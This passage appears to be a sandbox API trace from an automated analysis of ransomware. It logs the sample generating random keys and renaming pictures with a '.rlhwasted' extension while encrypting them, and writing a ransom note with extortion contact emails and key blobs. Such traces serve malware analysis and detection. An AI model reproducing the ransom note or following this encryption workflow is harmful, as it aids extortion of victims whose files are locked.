KEY:\r\n[begin_key]dYdF6rN2wDUVY6vwQd1TRJMzVCcgPEZ8kf/s7EtxUh7IjC+TnfIlwWhKjWKV9pwH\r\noaRrcBxQOZxDkJkXUR6ZSg0hk0qboG4+buDj+76PXRWWSs5oe8HGPPrjIkPF9xTd\r\naRT5wAM+N0B9VaIb4/iWg5IaJw+kHyKSqlrVbiIQ1O5tXO/QHJ47Pl5EF1wt9CKO\r\nPtxV1hL3mW44Oa7vAHfs/NwMeeJd8ZFmXBdJRVjlSftBLSc5ez+6pdD6AcaB+ehq\r\ny/uCwjDW1GxoYZZ/wkPU1VY6TEf2M+889wdOeoQTkIkl5+G5tVlsTCPw120Kx3Th\r\n2/DifO23WW/Zi8++ahYgoHe/yWnhwywW2XJWHFDZER1tSgoOSfc6FrCmrQMauzn+\r\nGYYb9jXXGXUiQDd2e84fa3JH1gQxzlQGVwKnLSgCXFN3b3QhtAnV/92qpznjqqfr\r\nnV501kksrzAXk2rPTdLPcGPetnOSgkKV0V7bY6tLH1fufhsQryabQU5cw+O2kukq\r\nr/2Dgoto9aAqp6hUj4ABQMSEzynFH1PYLLmaG+TnVVbMS5xUXdSIy9f4zWT4NLq+\r\nWAjULIwd+893qgodkEHRK5LC+2IBYHNk70N91aQ/0KynZ93qPVs2Rg1l2KLMEZ7m\r\nFqGqbANXzrhsSfbbHgTCYjUkArhsf1eRAoq0X/tv/Jl=[end_key]\r\nKEEP IT\r\n") returned 981 [0200.800] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d56a0 | out: hHeap=0x6b0000) returned 1 [0200.800] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0200.800] SetEndOfFile (hFile=0x108) returned 1 [0200.803] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0200.803] CloseHandle (hObject=0x108) returned 1 [0200.803] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0200.803] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f08a8 | out: hHeap=0x6b0000) returned 1 [0200.803] _aulldvrm () returned 0x0 [0200.803] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6fdff0) returned 1 [0200.805] CryptGenRandom (in: hProv=0x6fdff0, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0200.805] CryptReleaseContext (hProv=0x6fdff0, dwFlags=0x0) returned 1 [0200.805] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0200.805] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x278) returned 0x6d5420 [0200.805] lstrcpyW (in: lpString1=0x6d548e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0200.805] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0200.805] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6fdff0) returned 1 [0200.806] CryptGenRandom (in: hProv=0x6fdff0, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0200.806] CryptReleaseContext (hProv=0x6fdff0, dwFlags=0x0) returned 1 [0200.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.rlhwasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0200.807] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0200.808] SetEndOfFile (hFile=0x108) returned 1 [0200.808] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.808] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0200.808] lstrcpyW (in: lpString1=0x6d548e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0200.808] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.rlhwasted")) returned 1 [0200.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0200.809] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0200.810] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xce875 [0200.810] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xce875) returned 0x12b0000 [0200.810] CloseHandle (hObject=0x124) returned 1 [0200.865] UnmapViewOfFile (lpBaseAddress=0x12b0000) returned 1 [0200.873] CloseHandle (hObject=0x128) returned 1 [0200.874] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0200.874] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6fdf68) returned 1 [0200.874] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0200.874] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0200.875] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6fdf68) returned 1 [0200.875] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0200.875] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0200.883] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d56a0 [0200.883] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0200.883] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0200.884] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]bCKLf0gIxzdJdHZQpMmom4EDB7XOtssTO4SlmV7qE5mm6d8fzTzjrwerTWhDF04C\r\nv5sfnoAAXHwJMCj9rJkcMYFG0aOZ99DL6BVQSYtIAX86XTFazONo2SxFXb8NoH9K\r\nWh2tYFFxnm51EQpQURkwF5RyyH/2efSeP+UNzVPCN/XYxxWckQmAibnLv4BRhTM9\r\n7PBEa3VngTJ8RDHTGM+irZPj4YfsNAvmK2K+WRkpsO+Op/Bhgvd2gjakMtE/zBG9\r\nOZcqzkd/W3v4xXJ//zKddj0qS6nhWbL3Z331XkbcPLHxM3Fu5B6nIFF0mT/CWUqC\r\nreDi5BIN/mDrEuNU6f5O7Km1NCEz6R3LG0Qudr5D0dv/6dPu/L3tqrk3SbG7Lgnd\r\nP8SMOa5Y/S/aG6m4cO/UTcv1NXQ8uv55l69oOuNwMPHJsUyJBbuG/FuUJHMvmuw7\r\n1MXqpBsbxyvgaAgmIAn1ZPtAedp8mvPkg1NqwI6GaxX6SVYPtQh48l1YPYZNvj7y\r\nUru55u3nA+0R0+q2HS2z6lfKwZtouyCcCsbEzjartgVNRYRNN9X2miNOf4cjCUSd\r\n3AWiWH9YY2f4JrGpNL27D3hkEppLQSJZgrEEkO3KxhaGXwnLDe+6IXoyP1XgTSMC\r\nRxoWaowsLTeiin0XaJodT+MPEE1oF8oFbBS8j+zDZPD=[end_key]\r\nKEEP IT\r\n") returned 981 [0200.884] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d56a0 | out: hHeap=0x6b0000) returned 1 [0200.884] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0200.884] SetEndOfFile (hFile=0x108) returned 1 [0200.886] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0200.886] CloseHandle (hObject=0x108) returned 1 [0200.886] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0200.886] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f0970 | out: hHeap=0x6b0000) returned 1 [0200.886] _aulldvrm () returned 0x0 [0200.886] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6fdf68) returned 1 [0200.887] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0200.887] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0200.887] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0200.887] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x280) returned 0x6d5420 [0200.887] lstrcpyW (in: lpString1=0x6d5496, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0200.887] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0200.887] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6fdf68) returned 1 [0200.888] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0200.888] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0200.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.rlhwasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0200.889] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0200.890] SetEndOfFile (hFile=0x108) returned 1 [0200.890] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.890] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0200.890] lstrcpyW (in: lpString1=0x6d5496, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0200.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.rlhwasted")) returned 1 [0200.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0200.893] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0200.893] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x91554 [0200.894] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91554) returned 0x12b0000 [0200.894] CloseHandle (hObject=0x128) returned 1 [0200.994] UnmapViewOfFile (lpBaseAddress=0x12b0000) returned 1 [0201.000] CloseHandle (hObject=0x124) returned 1 [0201.000] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0201.000] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6fdf68) returned 1 [0201.001] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0201.001] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.001] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6fdf68) returned 1 [0201.001] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0201.001] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.009] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d56a8 [0201.009] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0201.009] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0201.010] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Cjc8nnbOT/HjCGhrh2ZeUgHjZNyF6T/hsUIMOyLzNDIBuPlTDnDB2P+nw3TrkyPv\r\nrlDUL85DsKNA3qCUhGCYwn0S+4272otSxTIRXqT6TGSV7CSWfPNhi3MT2tjmKOHV\r\nDB8W9HuN3JtbTeV7ofXR+3uyIUfNx0xpFx/4ZUQj726lYmZHCmCGAZulcz5pzUqz\r\nrFKtkHzOM+V7L72yx1joYdML5Y5L8bZb29ZH0KbT86fyKySgkboWKibOOo/Zuduf\r\nNnKPhcNu2FgAU3DHBzv3Q2IjODEl8EFoxv6WTLAmTJIALvqo5swz5P5CNGhAnP1c\r\nAzHr97vWKJsEBJICK5fWWqB94Qmma5QdLldlzao2MMfzzcsdJCgndz//5p5evfar\r\ndTJc5qusP+1aFlp7rkMWvbYaYv8G3Xjx8cR6QGWiAP/S6Kl5n/TOxtlFlUE4HxR4\r\ndazmp91CQ1zfQv6rwNcvsNdShpc+FIENqhzgk+do3CSA1q0GoB78UvZ5ZQ/XpcZA\r\nxM2J9RE0z7a7Y8yV2y69ajQPWl8VL03Mcc5L4961TTRDGSL6zc/mjvxqryPBjeGm\r\nLqyau5VNR3YXOskhYlG42nAVwmylXQ565Y+7tsv/9naMsLOlOQcM6tao3xPPvQs9\r\nUYrtbqmsfSbQH/tBV392rXkaeO/681KLa3qeZirOdyX=[end_key]\r\nKEEP IT\r\n") returned 981 [0201.010] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d56a8 | out: hHeap=0x6b0000) returned 1 [0201.010] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0201.010] SetEndOfFile (hFile=0x108) returned 1 [0201.012] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0201.012] CloseHandle (hObject=0x108) returned 1 [0201.012] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0201.012] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x706930 | out: hHeap=0x6b0000) returned 1 [0201.012] _aulldvrm () returned 0x0 [0201.012] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6fdf68) returned 1 [0201.013] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0201.013] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.013] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0201.013] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27e) returned 0x6d5420 [0201.013] lstrcpyW (in: lpString1=0x6d5494, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0201.013] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0201.013] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6fdf68) returned 1 [0201.014] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0201.014] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.rlhwasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0201.014] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0201.016] SetEndOfFile (hFile=0x108) returned 1 [0201.016] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.016] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0201.016] lstrcpyW (in: lpString1=0x6d5494, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0201.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.rlhwasted")) returned 1 [0201.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0201.020] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0201.020] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xbd616 [0201.020] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbd616) returned 0x12b0000 [0201.020] CloseHandle (hObject=0x124) returned 1 [0201.108] UnmapViewOfFile (lpBaseAddress=0x12b0000) returned 1 [0201.119] CloseHandle (hObject=0x128) returned 1 [0201.119] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0201.119] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6fdf68) returned 1 [0201.120] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0201.120] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.120] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6fdf68) returned 1 [0201.121] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0201.121] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.133] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d56a8 [0201.133] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0201.133] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0201.133] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]C1lkIOcizDXEQzZgE7a2ELYPr8DQZoWyQDBu+6E6VcorpBRpAKsVY6p8DA7vN1TQ\r\nDIeq8u9MtTzWVH8WIqreiVLEZ9rYSYVzwo7a3xPjHLuIdW0eWNjEgEj6XNDKlCbM\r\ncP8g+c5UcWjxkMKi/P5z5JpzsNBdu+d4Zs3G1wH6EMXgzy5hp47EUSK8aecqqoMv\r\n+AhvQeYbK9F4ZnnKAfTODrQnW9RTuzLg9f85XcbZkKprdcaFWECKlL6wKJgkhFPo\r\nDr7Ln39c1XkA/J8EThDTxt+AyqKIoPIUgtM75RH6kH1BZcsn/x3bRD0xrE/baecM\r\nIijrY0Obrkb9LVyA7hFrb8ejjX6nRUa6McWZocDHW6I5vzxzCiO2mxxu8XVTuhln\r\naxpC5Av+kmAjf9mbQoZrZIro7XZqd7AA6cu8lI3OMQTaoh9GLehMd1v7QbRqp9hL\r\n2i9FGUuD6Qd/h9pRCxHk30SRg0deiFRo+jeqnCoBartUiGqstZt8E/U6ADVL869T\r\n353sBMwNIVzVOK7lsexoKpKdY4aWwa9Ur1UKQ2+ehk0/SXJ/Qp2JaFD8WH8nULf3\r\nIB/lNorSfKaA9n2GiDnoO/oVkjihrcgKcV7k+1h0mkYsREqdjHFim0coHja2I/e8\r\n0QPphsG+XBPfZjJD9WuJ7tNl4SmP+IgKmDpnPm5Pz3t=[end_key]\r\nKEEP IT\r\n") returned 981 [0201.133] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d56a8 | out: hHeap=0x6b0000) returned 1 [0201.133] WriteFile (in: hFile=0x108, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0201.134] SetEndOfFile (hFile=0x108) returned 1 [0201.136] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0201.136] CloseHandle (hObject=0x108) returned 1 [0201.136] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0201.136] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x706a00 | out: hHeap=0x6b0000) returned 1 [0201.137] _aulldvrm () returned 0x0 [0201.137] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6fdf68) returned 1 [0201.138] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0201.138] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.138] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0201.138] RtlAllocateHeap (HeapHandle=0x6b0000, 